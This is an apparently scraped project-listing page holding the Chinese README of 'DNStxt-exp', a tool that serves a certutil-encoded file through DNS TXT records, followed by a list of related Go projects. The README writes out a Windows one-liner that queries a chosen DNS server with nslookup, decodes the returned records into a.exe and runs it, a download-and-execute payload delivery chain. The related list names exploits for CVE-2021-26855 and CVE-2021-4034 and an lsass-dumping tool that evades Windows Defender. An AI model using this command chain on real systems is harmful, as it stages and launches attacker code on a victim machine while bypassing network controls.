DNStxt-exp - 一个提供查询 TXT 记录的 DNS 服务利用工具。例如:可配合 Windows 下的 certutil 工具传输小文件(64KB)

DNStxt-exp

一个提供查询 TXT 记录的 DNS 服务利用工具。例如:可配合 Windows 下的 certutil 工具传输小文件(64KB)

HELP信息

_____________   _____________       _____                            
___  __ \__  | / /_  ___/_  /____  ___  /_      _________  _________ 
__  / / /_   |/ /_____ \_  __/_  |/_/  __/_______  _ \_  |/_/__  __ \
_  /_/ /_  /|  / ____/ // /_ __>  < / /_ _/_____/  __/_>  < __  /_/ /
/_____/ /_/ |_/  /____/ \__/ /_/|_| \__/        \___//_/|_| _  .___/ 
                                                            /_/

DNStxt-exp Version: 0.0.1 -- Created by vaycore

Options:
  -f string
        Generate encode.txt file command: ==> certutil.exe -encode artifact.exe encode.txt <==
         (default "encode.txt")
  -flag string
        Add prefix flag to lines (default "exec")
  -name string
        DNS server name (default "public1.alidns.com")
  -p int
        DNS server port (default 53)

使用方式

利用 Windows 自带的 certutil.exe 工具,先在生成一个 encode.txt 文件,命令如下:

certutil.exe -encode <要传输的文件> encode.txt

#例如:
certutil.exe -encode artifact.exe encode.txt

将文件放到与 DNStxt-exp 程序同级,然后执行,执行结果如下

$ ls
dnstxt-exp   encode.txt

$ ./dnstxt-exp
_____________   _____________       _____                            
___  __ \__  | / /_  ___/_  /____  ___  /_      _________  _________ 
__  / / /_   |/ /_____ \_  __/_  |/_/  __/_______  _ \_  |/_/__  __ \
_  /_/ /_  /|  / ____/ // /_ __>  < / /_ _/_____/  __/_>  < __  /_/ /
/_____/ /_/ |_/  /____/ \__/ /_/|_| \__/        \___//_/|_| _  .___/ 
                                                            /_/

DNStxt-exp Version: 0.0.1 -- Created by vaycore

Revert file and run:
cmd /v:on /Q /c "set a= && set b= && for /f "tokens=*" %i in ('nslookup -qt^=TXT www.baidu.com 0.0.0.0 ^| findstr "exec"') do (set a=%i && echo !a:~5,-2!)" > d.txt && certutil -decode d.txt a.exe && cmd /c a.exe

Start Listing ... 0.0.0.0:53, ServerName: public1.alidns.com

Windows 平台下使用 nslookup 工具查询和还原成文件命令(需要将下面的 0.0.0.0 配置 DNS 服务器的IP地址,a.exe 是目标文件):

cmd /v:on /Q /c "set a= && set b= && for /f "tokens=*" %i in ('nslookup -qt^=TXT www.baidu.com 0.0.0.0 ^| findstr "exec"') do (set a=%i && echo !a:~5,-2!)" > d.txt && certutil -decode d.txt a.exe

参考文章

https://mp.weixin.qq.com/s/pxKmEO3_ljWSW7WhNQbSzQ

Similar Resources

CVE-2021-26855 exp

CVE-2021-26855 CVE-2021-26855 ssrf 简单利用 golang 练习 影响版本 Exchange Server 2013 小于 CU23 Exchange Server 2016 小于 CU18 Exchange Server 2019 小于 CU7 利用条件 该漏洞不

Sep 12, 2022

Exp-tree: go library for parsing expression tree

Vinshop expression tree Exp-tree is go library for parsing expression tree Installation go get -u github.com/vinshop/exp-tree Quick start Format Expre

May 11, 2022

A golang based exp for CVE-2021-4034 dubbed pwnkit (more features added......)

A golang based exp for CVE-2021-4034 dubbed pwnkit (more features added......)

PwnKit-go-LPE (CVE-2021-4034) A golang based exp for CVE-2021-4034 dubbed pwnkit @@@@@@@ @@@ @@@ @@@ @@@ @@@ @@@ @@@ @@@ @@@@@@@

Nov 9, 2022

ssdt - Survey security.txt files

ssdt - Survey security.txt files A program to quickly survey security.txt files found on the Alexa Top 1 Million websites. The program takes about 15

Oct 31, 2022

grobotstxt is a native Go port of Google's robots.txt parser and matcher library.

grobotstxt grobotstxt is a native Go port of Google's robots.txt parser and matcher C++ library. Direct function-for-function conversion/port Preserve

Dec 27, 2022

Txt-lsp - A toy project with Language Server Protocol (LSP)

txt-lsp txt-lsp is a toy project where I play around with Language Server Protoc

Jan 22, 2022

Service that calls uzma24/project1 service, takes input from .txt file and prints JSON output returned from the service.

Service that calls uzma24/project1 service, takes input from .txt file and prints JSON output returned from the service. Program can take large input files.

Feb 6, 2022

This small Docker project is the easiest way to send notifications directly via .txt files to services like: Gotify, Telegram, SMTP (Email) or Webhook.

This small Docker project is the easiest way to send notifications directly via .txt files to services like: Gotify, Telegram, SMTP (Email) or Webhook.

This small Docker project is the easiest way to send notifications directly via .txt files to services like: Gotify, Telegram, SMTP (Email) or Webhook.

Oct 5, 2022

GoLang ads.txt scraper

Collects and parses ads.txt GoLang program scrapes sites for ads.txt and stores its significant details to PostgreSQL database. Give it a file with CS

Feb 11, 2022

Package for controlling the Windows firewall (aka Windows Filtering Platform, WFP)

wf What This is a package for controlling the Windows Filtering Platform (WFP), also known as the Windows firewall. See its docs: https://godoc.org/in

Dec 6, 2022

An example desktop system tray application that can launch HTML5 windows. Go source with a build process for Windows, Mac and Linux.

ExampleTrayGUI An example cross-platform (Mac, Windows, Linux) system tray application that can launch HTML5 windows, developed in Go including functi

Dec 3, 2022

An example desktop system tray application that can launch HTML5 windows. Go source with a build process for Windows, Mac and Linux.

ExampleTrayGUI An example cross-platform (Mac, Windows, Linux) system tray application that can launch HTML5 windows, developed in Go including functi

Dec 3, 2022

An example desktop system tray application that can launch HTML5 windows. Go source with a build process for Windows, Mac and Linux.

An example cross-platform (Mac, Windows, Linux) system tray application that can launch HTML5 windows, developed in Go including functional build process. This repository is intended as a quick reference to help others start similar projects using the referenced libraries and will not be actively maintained.

Dec 3, 2022

An example desktop system tray application that can launch HTML5 windows. Go source with a build process for Windows, Mac and Linux.

ExampleTrayGUI An example cross-platform (Mac, Windows, Linux) system tray application that can launch HTML5 windows, developed in Go including functi

Dec 3, 2022

W32find - Find parent windows and their children windows using win32api.

w32find Package w32find provides a set of interface to win32 APIs that can be used to find windows and their controls. Install go get -v github.com/mo

Jan 5, 2022

A DNS client in Go that supports Google DNS over HTTPS

dingo A DNS client (stub resolver) implemented in Go for the Google DNS-over-HTTPS. It effectively encrypts all your DNS traffic. It also supports Ope

Nov 9, 2022

dnscrypt-proxy 2 - A flexible DNS proxy, with support for encrypted DNS protocols.

dnscrypt-proxy 2 - A flexible DNS proxy, with support for encrypted DNS protocols.

Overview A flexible DNS proxy, with support for modern encrypted DNS protocols such as DNSCrypt v2, DNS-over-HTTPS and Anonymized DNSCrypt. dnscrypt-p

Jan 3, 2023

DNS Ping: to check packet loss and latency issues with DNS servers

DNSping DNS Ping checks packet loss and latency issues with DNS servers Installation If you have golang, easiest install is go get -u fortio.org/dnspi

Nov 18, 2022
Windows Store Installer for VS Code

vscode-winsta11er This repo contains the code for a simple Go-based installer for the new Windows store. Releases To create a release, create and push

Dec 9, 2022
GoDumpLsass is a simple tool that can dump lsass without to get caught by Windows Defender.

GoDumpLsass GoDumpLsass is a simple tool that can dump lsass without to get caught by Windows Defender. Releases https://github.com/Enelg52/GoDumpLsas

Nov 4, 2022
Graphical small-internet client for windows, linux, MacOS X and BSDs. Supports gemini, http, https, gopher, finger.
Graphical small-internet client for windows, linux, MacOS X and BSDs. Supports gemini, http, https, gopher, finger.

Graphical small-internet client for windows, linux, MacOS X and BSDs. Supports gemini, http, https, gopher, finger.

Jan 1, 2023
A CoreDNS plugin to serve temporary TXT records for validation purposes (eg. Let's Encrypt DNS-01)

temptxt Name temptxt - serves TXT records for validation purposes (eg. ACME DNS-01 challenge) updated through a HTTP api. Description The temptxt plug

Aug 23, 2022
DNS server using miekg/dns offering dynamic subdomains, time-over-dns, and standard zone file support.

dns-go DNS server using miekg/dns offering dynamic subdomains, time-over-dns, and standard zone file support. dynamic subdomains web.myapp.192.168.1.1

Dec 14, 2021
Hetzner-dns-updater - A simple tool to update a DNS record via Hetzner DNS API. Used for simple HA together with Nomad

hetzner-dns-updater A small utility tool to update a single record via Hetzner D

Feb 12, 2022
Microsoft ActiveX Object DataBase driver for go that using exp/sql

go-adodb Microsoft ADODB driver conforming to the built-in database/sql interface Installation This package can be installed with the go get command:

Dec 30, 2022
Suite of libraries for IoT devices (written in Go), experimental for x/exp/io

Go libraries/drivers for IoT devices This repo contains a suite of libraries for IoT devices/sensors/actuators. The suite is meant to be as dependency

Sep 26, 2022
CVE-2021-21978 exp
CVE-2021-21978 exp

CVE-2021-21978 CVE-2021-21978 RCE exp 影响版本 VMware View Planner Harness 4.X 与 CVE-2021-21978 类似,该漏洞可以在未授权访问的情况下,上传任意文件,并通过修改自带 py 脚本实现远程代码执行。

Nov 9, 2022
CVE-2021-26855 exp
CVE-2021-26855 exp

CVE-2021-26855 CVE-2021-26855 ssrf 简单利用 golang 练习 影响版本 Exchange Server 2013 小于 CU23 Exchange Server 2016 小于 CU18 Exchange Server 2019 小于 CU7 利用条件 该漏洞不

Sep 12, 2022